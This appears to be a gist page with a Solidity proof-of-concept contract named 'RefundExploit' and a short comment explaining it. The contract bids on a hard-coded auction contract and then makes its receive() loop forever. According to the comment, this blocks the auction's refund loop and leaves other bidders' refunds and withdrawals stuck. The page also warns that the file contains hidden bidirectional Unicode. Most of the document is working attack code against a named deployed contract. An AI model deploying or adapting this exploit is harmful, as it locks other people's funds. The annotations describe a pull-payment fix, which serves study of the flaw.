Created
April 22, 2022 22:05
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
// SPDX-License-Identifier: UNLICENSED | |
pragma solidity 0.8.13; | |
/// @title RefundExploit
/// @notice Proof-of-concept bidder contract showing how a receiver whose
///         receive() can be made to fail affects an auction that pushes
///         refunds to its bidders.
/// @dev Defensive reading: per the discussion on this page, the target's
///      processRefunds() stops making progress once a transfer to this
///      contract fails. The target's code is not shown here, so treat that as
///      reported behaviour. Pull-style withdrawals (each bidder claims their
///      own refund), or recording a failed transfer and moving on, avoid
///      depending on every recipient accepting ether.
///      NOTE(review): the hosting page flags this file as containing
///      bidirectional Unicode text; inspect the raw bytes before compiling.
contract RefundExploit {
    /// @dev While true, receive() never returns, so ether sent to this
    ///      contract cannot be delivered.
    bool blocked;

    /// @notice Places a bid on the external auction using the ether sent with
    ///         this call, then switches the contract into the blocked state.
    /// @dev Only the hard-coded address may call this. The 0x…01 value looks
    ///      like a placeholder for the operator's own address — confirm.
    function bid() external payable {
        require(msg.sender == 0x0000000000000000000000000000000000000001);
        // Hard-coded address of the auction contract, accessed through IAku.
        IAku aku = IAku(0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d);
        // Forward the full msg.value; the argument 1 is passed to bid(uint8).
        aku.bid{value: msg.value}(1);
        // Set only after the bid call returns, so ether received before this
        // point is still forwarded by receive() rather than rejected.
        blocked = true;
    }

    /// @notice Handles plain ether transfers to this contract.
    /// @dev Blocked: loops forever, so the transfer runs out of gas and fails
    ///      for the sender. Unblocked: forwards the received amount to the
    ///      hard-coded address and reverts if that forward fails.
    receive() external payable {
        if (blocked) {
            // Never terminates; the delivering call cannot complete.
            while (true) {}
        } else {
            (bool success, ) = 0x0000000000000000000000000000000000000001.call{
                value: msg.value
            }("");
            require(success);
        }
    }

    /// @notice Toggles whether incoming ether transfers are accepted.
    /// @param _blocked New value for the blocked flag.
    /// @dev Restricted to the same hard-coded address as bid().
    function setBlocked(bool _blocked) external {
        require(msg.sender == 0x0000000000000000000000000000000000000001);
        blocked = _blocked;
    }
}
/// @notice Minimal interface for the external auction contract; only the one
///         function used by RefundExploit is declared.
interface IAku {
    /// @dev Payable bid entry point. The uint8 parameter is unnamed here; the
    ///      caller passes 1 — presumably a quantity, confirm against the
    ///      target's source.
    function bid(uint8) external payable;
}
@Tung40194 The attacker's objective is not to lock the Aku contract and stop others from interacting with it.
Like @except said in his previous comment, when the receivable fallback fails
if(blocked) { revert() }
it stops the chain of refunds from continuing in the parent processRefunds()
function, which causes refunds and withdrawals to be stuck/locked.